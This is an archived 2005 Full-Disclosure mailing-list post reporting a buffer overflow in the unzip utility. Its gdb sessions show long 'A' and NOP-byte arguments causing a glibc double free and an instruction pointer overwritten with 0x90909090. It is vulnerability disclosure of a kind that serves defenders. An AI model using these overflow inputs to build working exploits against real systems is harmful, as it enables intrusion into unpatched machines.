lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon Dec 19 12:06:16 2005
From: c0ntexb at gmail.com (c0ntex)
Subject: Unzip *ALL* verisons ;))

Just to add to the pot, this little bug has been there a long time,
mmm, around 2+ yrs. Any apps calling unzip? Any unzip archives with
rather large files?

;)

[c0ntex@...uxbox tmp]$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library
"/lib/tls/libthread_db.so.1".
(gdb) r `perl -e 'print "A" x 5000'`
Starting program: /usr/bin/unzip `perl -e 'print "A" x 5000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...unzip: 
cannot find or open AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

[snip]

AAAAAAAAAAAAAA.ZIP.
*** glibc detected *** double free or corruption: 0x08075008 ***

Program received signal SIGABRT, Aborted.
0xffffe410 in __kernel_vsyscall ()
(gdb) bt
#0  0xffffe410 in __kernel_vsyscall ()
#1  0x002a2955 in raise () from /lib/tls/libc.so.6
#2  0x002a4319 in abort () from /lib/tls/libc.so.6
#3  0x002dba1b in malloc_printerr () from /lib/tls/libc.so.6
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
#5  0x080543a6 in ?? ()
#6  0x08075008 in ?? ()
#7  0x00000005 in ?? ()
#8  0x00000000 in ?? ()
(gdb) frame 4
#4  0x002dc4ba in free () from /lib/tls/libc.so.6
(gdb) i r
eax            0x0      0
ecx            0x10b7   4279
edx            0x6      6
ebx            0x39dff4 3792884
esp            0xbfdc2194       0xbfdc2194
ebp            0xbfdc21a8       0xbfdc21a8
esi            0x39f800 3799040
edi            0x8075008        134696968
eip            0x2dc4ba 0x2dc4ba
eflags         0x200246 2097734
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) x/s $edi
0x8075008:       'A' <repeats 196 times>
(gdb) x/s $esi
0x39f800 <main_arena>:   "\001"
(gdb)
0x39f802 <main_arena+2>:         ""
(gdb)


gdb) r `python -c 'print "\x90" * 50000'`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
warning: cannot close "shared object read from target memory": File in
wrong format
Starting program: /usr/bin/unzip `python -c 'print "\x90" * 50000'`
Reading symbols from shared object read from target memory...(no
debugging symbols found)...done.
Loaded system supplied DSO at 0xffffe000
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x90909090 in ?? ()
(gdb)


--

regards
c0ntex

Powered by blists - more mailing lists